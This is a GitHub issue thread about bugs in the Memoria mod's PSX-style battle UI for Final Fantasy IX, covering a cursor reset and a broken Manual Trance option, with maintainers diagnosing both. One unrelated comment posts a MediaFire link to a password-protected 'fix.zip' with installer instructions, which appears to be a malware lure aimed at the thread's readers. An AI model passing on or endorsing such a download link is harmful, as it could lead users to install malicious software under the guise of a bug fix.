### ISSUE TITLE
Bugs with PSX UI for battles

### ISSUE THREAD

**Issue by RandomUtilisateur** [Albeoris/Memoria#792]
When you Choose the PSX UI for battles, and play the game, if the character you are using is not on the "attack" line of the menu, but on an other one (like "steal" or "item" for exemple) and he is attacked by an ennemy (him in particular, not an other ally), the cursor goes back to the first line "attack" instead of staying on the line you were.

Also with the PSX UI for battles, the "Manual Trance" seems to not working, the "Trance" option appears instead of "change" if you press left, BUT the character keep changing his row instead of launching the Trance when you select it.

Hope you'll find a way to correct these, because your mod is so amazing, that's the only little problems to have the perfect FFIX experience in my opinion, thanks to you !

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by snouz** [comment]
Thanks, second bug is being handled here #787

First one, I found the 2 conditions for it to happen: cursor config needs to be "initial" + psx UI. I'll check if that's a recent bug

**Comment by Tirlititi** [comment]
That's about the same bug, I'll handle it (I rework that part).

**Comment by RandomUtilisateur** [comment]
> Thanks, second bug is being handled here #787
> 
> First one, I found the 2 conditions for it to happen: cursor config needs to be "initial" + psx UI. I'll check if that's a recent bug

Yes absolutely, it happens when the cursor is on "Initial" with the PSX Ui, memorized cursor prevent the bug to occur, but Memorized cursor can be a pain for some people (including me)
